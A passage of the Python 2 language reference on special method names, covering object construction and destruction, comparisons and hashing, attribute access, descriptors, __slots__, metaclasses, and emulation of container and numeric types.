If a base class has an\n "__init__()" method, the derived class\'s "__init__()" method, if\n any, must explicitly call it to ensure proper initialization of the\n base class part of the instance; for example:\n "BaseClass.__init__(self, [args...])".\n\n Because "__new__()" and "__init__()" work together in constructing\n objects ("__new__()" to create it, and "__init__()" to customise\n it), no non-"None" value may be returned by "__init__()"; doing so\n will cause a "TypeError" to be raised at runtime.\n\nobject.__del__(self)\n\n Called when the instance is about to be destroyed. This is also\n called a destructor. If a base class has a "__del__()" method, the\n derived class\'s "__del__()" method, if any, must explicitly call it\n to ensure proper deletion of the base class part of the instance.\n Note that it is possible (though not recommended!) for the\n "__del__()" method to postpone destruction of the instance by\n creating a new reference to it. It may then be called at a later\n time when this new reference is deleted. It is not guaranteed that\n "__del__()" methods are called for objects that still exist when\n the interpreter exits.\n\n Note: "del x" doesn\'t directly call "x.__del__()" --- the former\n decrements the reference count for "x" by one, and the latter is\n only called when "x"\'s reference count reaches zero. Some common\n situations that may prevent the reference count of an object from\n going to zero include: circular references between objects (e.g.,\n a doubly-linked list or a tree data structure with parent and\n child pointers); a reference to the object on the stack frame of\n a function that caught an exception (the traceback stored in\n "sys.exc_traceback" keeps the stack frame alive); or a reference\n to the object on the stack frame that raised an unhandled\n exception in interactive mode (the traceback stored in\n "sys.last_traceback" keeps the stack frame alive). The first\n situation can only be remedied by explicitly breaking the cycles;\n the latter two situations can be resolved by storing "None" in\n "sys.exc_traceback" or "sys.last_traceback". Circular references\n which are garbage are detected when the option cycle detector is\n enabled (it\'s on by default), but can only be cleaned up if there\n are no Python-level "__del__()" methods involved. Refer to the\n documentation for the "gc" module for more information about how\n "__del__()" methods are handled by the cycle detector,\n particularly the description of the "garbage" value.\n\n Warning: Due to the precarious circumstances under which\n "__del__()" methods are invoked, exceptions that occur during\n their execution are ignored, and a warning is printed to\n "sys.stderr" instead. Also, when "__del__()" is invoked in\n response to a module being deleted (e.g., when execution of the\n program is done), other globals referenced by the "__del__()"\n method may already have been deleted or in the process of being\n torn down (e.g. the import machinery shutting down). For this\n reason, "__del__()" methods should do the absolute minimum needed\n to maintain external invariants. 
Starting with version 1.5,\n Python guarantees that globals whose name begins with a single\n underscore are deleted from their module before other globals are\n deleted; if no other references to such globals exist, this may\n help in assuring that imported modules are still available at the\n time when the "__del__()" method is called.\n\n See also the "-R" command-line option.\n\nobject.__repr__(self)\n\n Called by the "repr()" built-in function and by string conversions\n (reverse quotes) to compute the "official" string representation of\n an object. If at all possible, this should look like a valid\n Python expression that could be used to recreate an object with the\n same value (given an appropriate environment). If this is not\n possible, a string of the form "<...some useful description...>"\n should be returned. The return value must be a string object. If a\n class defines "__repr__()" but not "__str__()", then "__repr__()"\n is also used when an "informal" string representation of instances\n of that class is required.\n\n This is typically used for debugging, so it is important that the\n representation is information-rich and unambiguous.\n\nobject.__str__(self)\n\n Called by the "str()" built-in function and by the "print"\n statement to compute the "informal" string representation of an\n object. This differs from "__repr__()" in that it does not have to\n be a valid Python expression: a more convenient or concise\n representation may be used instead. The return value must be a\n string object.\n\nobject.__lt__(self, other)\nobject.__le__(self, other)\nobject.__eq__(self, other)\nobject.__ne__(self, other)\nobject.__gt__(self, other)\nobject.__ge__(self, other)\n\n New in version 2.1.\n\n These are the so-called "rich comparison" methods, and are called\n for comparison operators in preference to "__cmp__()" below. The\n correspondence between operator symbols and method names is as\n follows: "x<y" calls "x.__lt__(y)", "x<=y" calls "x.__le__(y)",\n "x==y" calls "x.__eq__(y)", "x!=y" and "x<>y" call "x.__ne__(y)",\n "x>y" calls "x.__gt__(y)", and "x>=y" calls "x.__ge__(y)".\n\n A rich comparison method may return the singleton "NotImplemented"\n if it does not implement the operation for a given pair of\n arguments. By convention, "False" and "True" are returned for a\n successful comparison. However, these methods can return any value,\n so if the comparison operator is used in a Boolean context (e.g.,\n in the condition of an "if" statement), Python will call "bool()"\n on the value to determine if the result is true or false.\n\n There are no implied relationships among the comparison operators.\n The truth of "x==y" does not imply that "x!=y" is false.\n Accordingly, when defining "__eq__()", one should also define\n "__ne__()" so that the operators will behave as expected. 
See the\n paragraph on "__hash__()" for some important notes on creating\n *hashable* objects which support custom comparison operations and\n are usable as dictionary keys.\n\n There are no swapped-argument versions of these methods (to be used\n when the left argument does not support the operation but the right\n argument does); rather, "__lt__()" and "__gt__()" are each other\'s\n reflection, "__le__()" and "__ge__()" are each other\'s reflection,\n and "__eq__()" and "__ne__()" are their own reflection.\n\n Arguments to rich comparison methods are never coerced.\n\n To automatically generate ordering operations from a single root\n operation, see "functools.total_ordering()".\n\nobject.__cmp__(self, other)\n\n   Called by comparison operations if rich comparison (see above) is\n   not defined. Should return a negative integer if "self < other",\n   zero if "self == other", a positive integer if "self > other". If\n   no "__cmp__()", "__eq__()" or "__ne__()" operation is defined,\n   class instances are compared by object identity ("address"). See\n   also the description of "__hash__()" for some important notes on\n   creating *hashable* objects which support custom comparison\n   operations and are usable as dictionary keys. (Note: the\n   restriction that exceptions are not propagated by "__cmp__()" has\n   been removed since Python 1.5.)\n\nobject.__rcmp__(self, other)\n\n   Changed in version 2.1: No longer supported.\n\nobject.__hash__(self)\n\n   Called by built-in function "hash()" and for operations on members\n   of hashed collections including "set", "frozenset", and "dict".\n   "__hash__()" should return an integer. The only required property\n   is that objects which compare equal have the same hash value; it is\n   advised to somehow mix together (e.g. using exclusive or) the hash\n   values for the components of the object that also play a part in\n   comparison of objects.\n\n   If a class does not define a "__cmp__()" or "__eq__()" method, it\n   should not define a "__hash__()" operation either; if it defines\n   "__cmp__()" or "__eq__()" but not "__hash__()", its instances will\n   not be usable in hashed collections. If a class defines mutable\n   objects and implements a "__cmp__()" or "__eq__()" method, it\n   should not implement "__hash__()", since hashable collection\n   implementations require that an object\'s hash value is immutable (if\n   the object\'s hash value changes, it will be in the wrong hash\n   bucket).\n\n   User-defined classes have "__cmp__()" and "__hash__()" methods by\n   default; with them, all objects compare unequal (except with\n   themselves) and "x.__hash__()" returns a result derived from\n   "id(x)".\n\n   Classes which inherit a "__hash__()" method from a parent class but\n   change the meaning of "__cmp__()" or "__eq__()" such that the hash\n   value returned is no longer appropriate (e.g. by switching to a\n   value-based concept of equality instead of the default identity\n   based equality) can explicitly flag themselves as being unhashable\n   by setting "__hash__ = None" in the class definition. 
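For example (an\n   illustrative sketch; "Base" stands in for any hashable parent\n   class):\n\n      class ValueEqual(Base):\n          def __eq__(self, other):  # switch to value-based equality\n              return self.value == other.value\n          __hash__ = None  # flag instances as unhashable\n\n   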
Doing so\n means that not only will instances of the class raise an\n appropriate "TypeError" when a program attempts to retrieve their\n hash value, but they will also be correctly identified as\n unhashable when checking "isinstance(obj, collections.Hashable)"\n (unlike classes which define their own "__hash__()" to explicitly\n raise "TypeError").\n\n Changed in version 2.5: "__hash__()" may now also return a long\n integer object; the 32-bit integer is then derived from the hash of\n that object.\n\n Changed in version 2.6: "__hash__" may now be set to "None" to\n explicitly flag instances of a class as unhashable.\n\nobject.__nonzero__(self)\n\n Called to implement truth value testing and the built-in operation\n "bool()"; should return "False" or "True", or their integer\n equivalents "0" or "1". When this method is not defined,\n "__len__()" is called, if it is defined, and the object is\n considered true if its result is nonzero. If a class defines\n neither "__len__()" nor "__nonzero__()", all its instances are\n considered true.\n\nobject.__unicode__(self)\n\n Called to implement "unicode()" built-in; should return a Unicode\n object. When this method is not defined, string conversion is\n attempted, and the result of string conversion is converted to\n Unicode using the system default encoding.\n\n\nCustomizing attribute access\n============================\n\nThe following methods can be defined to customize the meaning of\nattribute access (use of, assignment to, or deletion of "x.name") for\nclass instances.\n\nobject.__getattr__(self, name)\n\n Called when an attribute lookup has not found the attribute in the\n usual places (i.e. it is not an instance attribute nor is it found\n in the class tree for "self"). "name" is the attribute name. This\n method should return the (computed) attribute value or raise an\n "AttributeError" exception.\n\n Note that if the attribute is found through the normal mechanism,\n "__getattr__()" is not called. (This is an intentional asymmetry\n between "__getattr__()" and "__setattr__()".) This is done both for\n efficiency reasons and because otherwise "__getattr__()" would have\n no way to access other attributes of the instance. Note that at\n least for instance variables, you can fake total control by not\n inserting any values in the instance attribute dictionary (but\n instead inserting them in another object). See the\n "__getattribute__()" method below for a way to actually get total\n control in new-style classes.\n\nobject.__setattr__(self, name, value)\n\n Called when an attribute assignment is attempted. This is called\n instead of the normal mechanism (i.e. store the value in the\n instance dictionary). *name* is the attribute name, *value* is the\n value to be assigned to it.\n\n If "__setattr__()" wants to assign to an instance attribute, it\n should not simply execute "self.name = value" --- this would cause\n a recursive call to itself. Instead, it should insert the value in\n the dictionary of instance attributes, e.g., "self.__dict__[name] =\n value". For new-style classes, rather than accessing the instance\n dictionary, it should call the base class method with the same\n name, for example, "object.__setattr__(self, name, value)".\n\nobject.__delattr__(self, name)\n\n Like "__setattr__()" but for attribute deletion instead of\n assignment. 
This should only be implemented if "del obj.name" is\n meaningful for the object.\n\n\nMore attribute access for new-style classes\n-------------------------------------------\n\nThe following methods only apply to new-style classes.\n\nobject.__getattribute__(self, name)\n\n Called unconditionally to implement attribute accesses for\n instances of the class. If the class also defines "__getattr__()",\n the latter will not be called unless "__getattribute__()" either\n calls it explicitly or raises an "AttributeError". This method\n should return the (computed) attribute value or raise an\n "AttributeError" exception. In order to avoid infinite recursion in\n this method, its implementation should always call the base class\n method with the same name to access any attributes it needs, for\n example, "object.__getattribute__(self, name)".\n\n Note: This method may still be bypassed when looking up special\n methods as the result of implicit invocation via language syntax\n or built-in functions. See Special method lookup for new-style\n classes.\n\n\nImplementing Descriptors\n------------------------\n\nThe following methods only apply when an instance of the class\ncontaining the method (a so-called *descriptor* class) appears in an\n*owner* class (the descriptor must be in either the owner\'s class\ndictionary or in the class dictionary for one of its parents). In the\nexamples below, "the attribute" refers to the attribute whose name is\nthe key of the property in the owner class\' "__dict__".\n\nobject.__get__(self, instance, owner)\n\n Called to get the attribute of the owner class (class attribute\n access) or of an instance of that class (instance attribute\n access). *owner* is always the owner class, while *instance* is the\n instance that the attribute was accessed through, or "None" when\n the attribute is accessed through the *owner*. This method should\n return the (computed) attribute value or raise an "AttributeError"\n exception.\n\nobject.__set__(self, instance, value)\n\n Called to set the attribute on an instance *instance* of the owner\n class to a new value, *value*.\n\nobject.__delete__(self, instance)\n\n Called to delete the attribute on an instance *instance* of the\n owner class.\n\n\nInvoking Descriptors\n--------------------\n\nIn general, a descriptor is an object attribute with "binding\nbehavior", one whose attribute access has been overridden by methods\nin the descriptor protocol: "__get__()", "__set__()", and\n"__delete__()". If any of those methods are defined for an object, it\nis said to be a descriptor.\n\nThe default behavior for attribute access is to get, set, or delete\nthe attribute from an object\'s dictionary. For instance, "a.x" has a\nlookup chain starting with "a.__dict__[\'x\']", then\n"type(a).__dict__[\'x\']", and continuing through the base classes of\n"type(a)" excluding metaclasses.\n\nHowever, if the looked-up value is an object defining one of the\ndescriptor methods, then Python may override the default behavior and\ninvoke the descriptor method instead. Where this occurs in the\nprecedence chain depends on which descriptor methods were defined and\nhow they were called. Note that descriptors are only invoked for new\nstyle objects or classes (ones that subclass "object()" or "type()").\n\nThe starting point for descriptor invocation is a binding, "a.x". 
How\nthe arguments are assembled depends on "a":\n\nDirect Call\n   The simplest and least common call is when user code directly\n   invokes a descriptor method: "x.__get__(a)".\n\nInstance Binding\n   If binding to a new-style object instance, "a.x" is transformed\n   into the call: "type(a).__dict__[\'x\'].__get__(a, type(a))".\n\nClass Binding\n   If binding to a new-style class, "A.x" is transformed into the\n   call: "A.__dict__[\'x\'].__get__(None, A)".\n\nSuper Binding\n   If "a" is an instance of "super", then the binding "super(B,\n   obj).m()" searches "obj.__class__.__mro__" for the base class "A"\n   immediately preceding "B" and then invokes the descriptor with the\n   call: "A.__dict__[\'m\'].__get__(obj, obj.__class__)".\n\nFor instance bindings, the precedence of descriptor invocation depends\non which descriptor methods are defined. A descriptor can define\nany combination of "__get__()", "__set__()" and "__delete__()". If it\ndoes not define "__get__()", then accessing the attribute will return\nthe descriptor object itself unless there is a value in the object\'s\ninstance dictionary. If the descriptor defines "__set__()" and/or\n"__delete__()", it is a data descriptor; if it defines neither, it is\na non-data descriptor. Normally, data descriptors define both\n"__get__()" and "__set__()", while non-data descriptors have just the\n"__get__()" method. Data descriptors with "__set__()" and "__get__()"\ndefined always override a redefinition in an instance dictionary. In\ncontrast, non-data descriptors can be overridden by instances.\n\nPython methods (including "staticmethod()" and "classmethod()") are\nimplemented as non-data descriptors. Accordingly, instances can\nredefine and override methods. This allows individual instances to\nacquire behaviors that differ from other instances of the same class.\n\nThe "property()" function is implemented as a data descriptor.\nAccordingly, instances cannot override the behavior of a property.\n\n\n__slots__\n---------\n\nBy default, instances of both old and new-style classes have a\ndictionary for attribute storage. This wastes space for objects\nhaving very few instance variables. The space consumption can become\nacute when creating large numbers of instances.\n\nThe default can be overridden by defining *__slots__* in a new-style\nclass definition. The *__slots__* declaration takes a sequence of\ninstance variables and reserves just enough space in each instance to\nhold a value for each variable. Space is saved because *__dict__* is\nnot created for each instance.\n\n__slots__\n\n   This class variable can be assigned a string, iterable, or sequence\n   of strings with variable names used by instances. If defined in a\n   new-style class, *__slots__* reserves space for the declared\n   variables and prevents the automatic creation of *__dict__* and\n   *__weakref__* for each instance.\n\n   New in version 2.2.\n\nNotes on using *__slots__*\n\n* When inheriting from a class without *__slots__*, the *__dict__*\n  attribute of that class will always be accessible, so a *__slots__*\n  definition in the subclass is meaningless.\n\n* Without a *__dict__* variable, instances cannot be assigned new\n  variables not listed in the *__slots__* definition. Attempts to\n  assign to an unlisted variable name raise "AttributeError". 
If\n dynamic assignment of new variables is desired, then add\n "\'__dict__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__dict__\'" to the\n *__slots__* declaration would not enable the assignment of new\n attributes not specifically listed in the sequence of instance\n variable names.\n\n* Without a *__weakref__* variable for each instance, classes\n defining *__slots__* do not support weak references to its\n instances. If weak reference support is needed, then add\n "\'__weakref__\'" to the sequence of strings in the *__slots__*\n declaration.\n\n Changed in version 2.3: Previously, adding "\'__weakref__\'" to the\n *__slots__* declaration would not enable support for weak\n references.\n\n* *__slots__* are implemented at the class level by creating\n descriptors (Implementing Descriptors) for each variable name. As a\n result, class attributes cannot be used to set default values for\n instance variables defined by *__slots__*; otherwise, the class\n attribute would overwrite the descriptor assignment.\n\n* The action of a *__slots__* declaration is limited to the class\n where it is defined. As a result, subclasses will have a *__dict__*\n unless they also define *__slots__* (which must only contain names\n of any *additional* slots).\n\n* If a class defines a slot also defined in a base class, the\n instance variable defined by the base class slot is inaccessible\n (except by retrieving its descriptor directly from the base class).\n This renders the meaning of the program undefined. In the future, a\n check may be added to prevent this.\n\n* Nonempty *__slots__* does not work for classes derived from\n "variable-length" built-in types such as "long", "str" and "tuple".\n\n* Any non-string iterable may be assigned to *__slots__*. Mappings\n may also be used; however, in the future, special meaning may be\n assigned to the values corresponding to each key.\n\n* *__class__* assignment works only if both classes have the same\n *__slots__*.\n\n Changed in version 2.6: Previously, *__class__* assignment raised an\n error if either new or old class had *__slots__*.\n\n\nCustomizing class creation\n==========================\n\nBy default, new-style classes are constructed using "type()". A class\ndefinition is read into a separate namespace and the value of class\nname is bound to the result of "type(name, bases, dict)".\n\nWhen the class definition is read, if *__metaclass__* is defined then\nthe callable assigned to it will be called instead of "type()". This\nallows classes or functions to be written which monitor or alter the\nclass creation process:\n\n* Modifying the class dictionary prior to the class being created.\n\n* Returning an instance of another class -- essentially performing\n the role of a factory function.\n\nThese steps will have to be performed in the metaclass\'s "__new__()"\nmethod -- "type.__new__()" can then be called from this method to\ncreate a class with different properties. This example adds a new\nelement to the class dictionary before creating the class:\n\n class metacls(type):\n def __new__(mcs, name, bases, dict):\n dict[\'foo\'] = \'metacls was here\'\n return type.__new__(mcs, name, bases, dict)\n\nYou can of course also override other class methods (or add new\nmethods); for example defining a custom "__call__()" method in the\nmetaclass allows custom behavior when the class is called, e.g. 
not\nalways creating a new instance.\n\n__metaclass__\n\n   This variable can be any callable accepting arguments for "name",\n   "bases", and "dict". Upon class creation, the callable is used\n   instead of the built-in "type()".\n\n   New in version 2.2.\n\nThe appropriate metaclass is determined by the following precedence\nrules:\n\n* If "dict[\'__metaclass__\']" exists, it is used.\n\n* Otherwise, if there is at least one base class, its metaclass is\n  used (this looks for a *__class__* attribute first and if not found,\n  uses its type).\n\n* Otherwise, if a global variable named __metaclass__ exists, it is\n  used.\n\n* Otherwise, the old-style, classic metaclass (types.ClassType) is\n  used.\n\nThe potential uses for metaclasses are boundless. Some ideas that have\nbeen explored include logging, interface checking, automatic\ndelegation, automatic property creation, proxies, frameworks, and\nautomatic resource locking/synchronization.\n\n\nCustomizing instance and subclass checks\n========================================\n\nNew in version 2.6.\n\nThe following methods are used to override the default behavior of the\n"isinstance()" and "issubclass()" built-in functions.\n\nIn particular, the metaclass "abc.ABCMeta" implements these methods in\norder to allow the addition of Abstract Base Classes (ABCs) as\n"virtual base classes" to any class or type (including built-in\ntypes), including other ABCs.\n\nclass.__instancecheck__(self, instance)\n\n   Return true if *instance* should be considered a (direct or\n   indirect) instance of *class*. If defined, called to implement\n   "isinstance(instance, class)".\n\nclass.__subclasscheck__(self, subclass)\n\n   Return true if *subclass* should be considered a (direct or\n   indirect) subclass of *class*. If defined, called to implement\n   "issubclass(subclass, class)".\n\nNote that these methods are looked up on the type (metaclass) of a\nclass. They cannot be defined as class methods in the actual class.\nThis is consistent with the lookup of special methods that are called\non instances, only in this case the instance is itself a class.\n\nSee also:\n\n  **PEP 3119** - Introducing Abstract Base Classes\n     Includes the specification for customizing "isinstance()" and\n     "issubclass()" behavior through "__instancecheck__()" and\n     "__subclasscheck__()", with motivation for this functionality in\n     the context of adding Abstract Base Classes (see the "abc"\n     module) to the language.\n\n\nEmulating callable objects\n==========================\n\nobject.__call__(self[, args...])\n\n   Called when the instance is "called" as a function; if this method\n   is defined, "x(arg1, arg2, ...)" is a shorthand for\n   "x.__call__(arg1, arg2, ...)".\n\n\nEmulating container types\n=========================\n\nThe following methods can be defined to implement container objects.\nContainers usually are sequences (such as lists or tuples) or mappings\n(like dictionaries), but can represent other containers as well. The\nfirst set of methods is used either to emulate a sequence or to\nemulate a mapping; the difference is that for a sequence, the\nallowable keys should be the integers *k* for which "0 <= k < N" where\n*N* is the length of the sequence, or slice objects, which define a\nrange of items. (For backwards compatibility, the method\n"__getslice__()" (see below) can also be defined to handle simple, but\nnot extended slices.) 
It is also recommended that mappings provide the\nmethods "keys()", "values()", "items()", "has_key()", "get()",\n"clear()", "setdefault()", "iterkeys()", "itervalues()",\n"iteritems()", "pop()", "popitem()", "copy()", and "update()" behaving\nsimilarly to those for Python\'s standard dictionary objects. The\n"UserDict" module provides a "DictMixin" class to help create those\nmethods from a base set of "__getitem__()", "__setitem__()",\n"__delitem__()", and "keys()". Mutable sequences should provide\nmethods "append()", "count()", "index()", "extend()", "insert()",\n"pop()", "remove()", "reverse()" and "sort()", like Python standard\nlist objects. Finally, sequence types should implement addition\n(meaning concatenation) and multiplication (meaning repetition) by\ndefining the methods "__add__()", "__radd__()", "__iadd__()",\n"__mul__()", "__rmul__()" and "__imul__()" described below; they\nshould not define "__coerce__()" or other numerical operators. It is\nrecommended that both mappings and sequences implement the\n"__contains__()" method to allow efficient use of the "in" operator;\nfor mappings, "in" should be equivalent to "has_key()"; for sequences,\nit should search through the values. It is further recommended that\nboth mappings and sequences implement the "__iter__()" method to allow\nefficient iteration through the container; for mappings, "__iter__()"\nshould be the same as "iterkeys()"; for sequences, it should iterate\nthrough the values.\n\nobject.__len__(self)\n\n   Called to implement the built-in function "len()". Should return\n   the length of the object, an integer ">=" 0. Also, an object that\n   doesn\'t define a "__nonzero__()" method and whose "__len__()"\n   method returns zero is considered to be false in a Boolean context.\n\nobject.__getitem__(self, key)\n\n   Called to implement evaluation of "self[key]". For sequence types,\n   the accepted keys should be integers and slice objects. Note that\n   the special interpretation of negative indexes (if the class wishes\n   to emulate a sequence type) is up to the "__getitem__()" method. If\n   *key* is of an inappropriate type, "TypeError" may be raised; if of\n   a value outside the set of indexes for the sequence (after any\n   special interpretation of negative values), "IndexError" should be\n   raised. For mapping types, if *key* is missing (not in the\n   container), "KeyError" should be raised.\n\n   Note: "for" loops expect that an "IndexError" will be raised for\n     illegal indexes to allow proper detection of the end of the\n     sequence.\n\nobject.__missing__(self, key)\n\n   Called by "dict"."__getitem__()" to implement "self[key]" for dict\n   subclasses when key is not in the dictionary.\n\nobject.__setitem__(self, key, value)\n\n   Called to implement assignment to "self[key]". Same note as for\n   "__getitem__()". This should only be implemented for mappings if\n   the objects support changes to the values for keys, or if new keys\n   can be added, or for sequences if elements can be replaced. The\n   same exceptions should be raised for improper *key* values as for\n   the "__getitem__()" method.\n\nobject.__delitem__(self, key)\n\n   Called to implement deletion of "self[key]". Same note as for\n   "__getitem__()". This should only be implemented for mappings if\n   the objects support removal of keys, or for sequences if elements\n   can be removed from the sequence. 
The same exceptions should be\n   raised for improper *key* values as for the "__getitem__()" method.\n\nobject.__iter__(self)\n\n   This method is called when an iterator is required for a container.\n   This method should return a new iterator object that can iterate\n   over all the objects in the container. For mappings, it should\n   iterate over the keys of the container, and should also be made\n   available as the method "iterkeys()".\n\n   Iterator objects also need to implement this method; they are\n   required to return themselves. For more information on iterator\n   objects, see Iterator Types.\n\nobject.__reversed__(self)\n\n   Called (if present) by the "reversed()" built-in to implement\n   reverse iteration. It should return a new iterator object that\n   iterates over all the objects in the container in reverse order.\n\n   If the "__reversed__()" method is not provided, the "reversed()"\n   built-in will fall back to using the sequence protocol ("__len__()"\n   and "__getitem__()"). Objects that support the sequence protocol\n   should only provide "__reversed__()" if they can provide an\n   implementation that is more efficient than the one provided by\n   "reversed()".\n\n   New in version 2.6.\n\nThe membership test operators ("in" and "not in") are normally\nimplemented as an iteration through a sequence. However, container\nobjects can supply the following special method with a more efficient\nimplementation, which also does not require the object be a sequence.\n\nobject.__contains__(self, item)\n\n   Called to implement membership test operators. Should return true\n   if *item* is in *self*, false otherwise. For mapping objects, this\n   should consider the keys of the mapping rather than the values or\n   the key-item pairs.\n\n   For objects that don\'t define "__contains__()", the membership test\n   first tries iteration via "__iter__()", then the old sequence\n   iteration protocol via "__getitem__()", see this section in the\n   language reference.\n\n\nAdditional methods for emulation of sequence types\n==================================================\n\nThe following optional methods can be defined to further emulate\nsequence objects. Immutable sequence types should at most\ndefine "__getslice__()"; mutable sequences might define all three\nmethods.\n\nobject.__getslice__(self, i, j)\n\n   Deprecated since version 2.0: Support slice objects as parameters\n   to the "__getitem__()" method. (However, built-in types in CPython\n   currently still implement "__getslice__()". Therefore, you have to\n   override it in derived classes when implementing slicing.)\n\n   Called to implement evaluation of "self[i:j]". The returned object\n   should be of the same type as *self*. Note that missing *i* or *j*\n   in the slice expression are replaced by zero or "sys.maxsize",\n   respectively. If negative indexes are used in the slice, the\n   length of the sequence is added to that index. If the instance does\n   not implement the "__len__()" method, an "AttributeError" is\n   raised. No guarantee is made that indexes adjusted this way are not\n   still negative. Indexes which are greater than the length of the\n   sequence are not modified. If no "__getslice__()" is found, a slice\n   object is created and passed to "__getitem__()" instead.\n\nobject.__setslice__(self, i, j, sequence)\n\n   Called to implement assignment to "self[i:j]". Same notes for *i*\n   and *j* as for "__getslice__()".\n\n   This method is deprecated. 
If no "__setslice__()" is found, or for\n extended slicing of the form "self[i:j:k]", a slice object is\n created, and passed to "__setitem__()", instead of "__setslice__()"\n being called.\n\nobject.__delslice__(self, i, j)\n\n Called to implement deletion of "self[i:j]". Same notes for *i* and\n *j* as for "__getslice__()". This method is deprecated. If no\n "__delslice__()" is found, or for extended slicing of the form\n "self[i:j:k]", a slice object is created, and passed to\n "__delitem__()", instead of "__delslice__()" being called.\n\nNotice that these methods are only invoked when a single slice with a\nsingle colon is used, and the slice method is available. For slice\noperations involving extended slice notation, or in absence of the\nslice methods, "__getitem__()", "__setitem__()" or "__delitem__()" is\ncalled with a slice object as argument.\n\nThe following example demonstrate how to make your program or module\ncompatible with earlier versions of Python (assuming that methods\n"__getitem__()", "__setitem__()" and "__delitem__()" support slice\nobjects as arguments):\n\n class MyClass:\n ...\n def __getitem__(self, index):\n ...\n def __setitem__(self, index, value):\n ...\n def __delitem__(self, index):\n ...\n\n if sys.version_info < (2, 0):\n # They won\'t be defined if version is at least 2.0 final\n\n def __getslice__(self, i, j):\n return self[max(0, i):max(0, j):]\n def __setslice__(self, i, j, seq):\n self[max(0, i):max(0, j):] = seq\n def __delslice__(self, i, j):\n del self[max(0, i):max(0, j):]\n ...\n\nNote the calls to "max()"; these are necessary because of the handling\nof negative indices before the "__*slice__()" methods are called.\nWhen negative indexes are used, the "__*item__()" methods receive them\nas provided, but the "__*slice__()" methods get a "cooked" form of the\nindex values. For each negative index value, the length of the\nsequence is added to the index before calling the method (which may\nstill result in a negative index); this is the customary handling of\nnegative indexes by the built-in sequence types, and the "__*item__()"\nmethods are expected to do this as well. However, since they should\nalready be doing that, negative indexes cannot be passed in; they must\nbe constrained to the bounds of the sequence before being passed to\nthe "__*item__()" methods. Calling "max(0, i)" conveniently returns\nthe proper value.\n\n\nEmulating numeric types\n=======================\n\nThe following methods can be defined to emulate numeric objects.\nMethods corresponding to operations that are not supported by the\nparticular kind of number implemented (e.g., bitwise operations for\nnon-integral numbers) should be left undefined.\n\nobject.__add__(self, other)\nobject.__sub__(self, other)\nobject.__mul__(self, other)\nobject.__floordiv__(self, other)\nobject.__mod__(self, other)\nobject.__divmod__(self, other)\nobject.__pow__(self, other[, modulo])\nobject.__lshift__(self, other)\nobject.__rshift__(self, other)\nobject.__and__(self, other)\nobject.__xor__(self, other)\nobject.__or__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "//", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|"). For instance, to evaluate the\n expression "x + y", where *x* is an instance of a class that has an\n "__add__()" method, "x.__add__(y)" is called. 
The "__divmod__()"\n method should be the equivalent to using "__floordiv__()" and\n "__mod__()"; it should not be related to "__truediv__()" (described\n below). Note that "__pow__()" should be defined to accept an\n optional third argument if the ternary version of the built-in\n "pow()" function is to be supported.\n\n If one of those methods does not support the operation with the\n supplied arguments, it should return "NotImplemented".\n\nobject.__div__(self, other)\nobject.__truediv__(self, other)\n\n The division operator ("/") is implemented by these methods. The\n "__truediv__()" method is used when "__future__.division" is in\n effect, otherwise "__div__()" is used. If only one of these two\n methods is defined, the object will not support division in the\n alternate context; "TypeError" will be raised instead.\n\nobject.__radd__(self, other)\nobject.__rsub__(self, other)\nobject.__rmul__(self, other)\nobject.__rdiv__(self, other)\nobject.__rtruediv__(self, other)\nobject.__rfloordiv__(self, other)\nobject.__rmod__(self, other)\nobject.__rdivmod__(self, other)\nobject.__rpow__(self, other)\nobject.__rlshift__(self, other)\nobject.__rrshift__(self, other)\nobject.__rand__(self, other)\nobject.__rxor__(self, other)\nobject.__ror__(self, other)\n\n These methods are called to implement the binary arithmetic\n operations ("+", "-", "*", "/", "%", "divmod()", "pow()", "**",\n "<<", ">>", "&", "^", "|") with reflected (swapped) operands.\n These functions are only called if the left operand does not\n support the corresponding operation and the operands are of\n different types. [2] For instance, to evaluate the expression "x -\n y", where *y* is an instance of a class that has an "__rsub__()"\n method, "y.__rsub__(x)" is called if "x.__sub__(y)" returns\n *NotImplemented*.\n\n Note that ternary "pow()" will not try calling "__rpow__()" (the\n coercion rules would become too complicated).\n\n Note: If the right operand\'s type is a subclass of the left\n operand\'s type and that subclass provides the reflected method\n for the operation, this method will be called before the left\n operand\'s non-reflected method. This behavior allows subclasses\n to override their ancestors\' operations.\n\nobject.__iadd__(self, other)\nobject.__isub__(self, other)\nobject.__imul__(self, other)\nobject.__idiv__(self, other)\nobject.__itruediv__(self, other)\nobject.__ifloordiv__(self, other)\nobject.__imod__(self, other)\nobject.__ipow__(self, other[, modulo])\nobject.__ilshift__(self, other)\nobject.__irshift__(self, other)\nobject.__iand__(self, other)\nobject.__ixor__(self, other)\nobject.__ior__(self, other)\n\n These methods are called to implement the augmented arithmetic\n assignments ("+=", "-=", "*=", "/=", "//=", "%=", "**=", "<<=",\n ">>=", "&=", "^=", "|="). These methods should attempt to do the\n operation in-place (modifying *self*) and return the result (which\n could be, but does not have to be, *self*). If a specific method\n is not defined, the augmented assignment falls back to the normal\n methods. For instance, to execute the statement "x += y", where\n *x* is an instance of a class that has an "__iadd__()" method,\n "x.__iadd__(y)" is called. 
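As an illustrative sketch (the "Accumulator" class is hypothetical),\nan in-place method typically mutates *self* and returns it:\n\n   class Accumulator(object):\n       def __init__(self):\n           self.total = 0\n       def __iadd__(self, other):\n           # Modify self in place, then return it.\n           self.total += other\n           return self\n\n   >>> a = Accumulator()\n   >>> a += 5\n   >>> a.total\n   5\n\n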
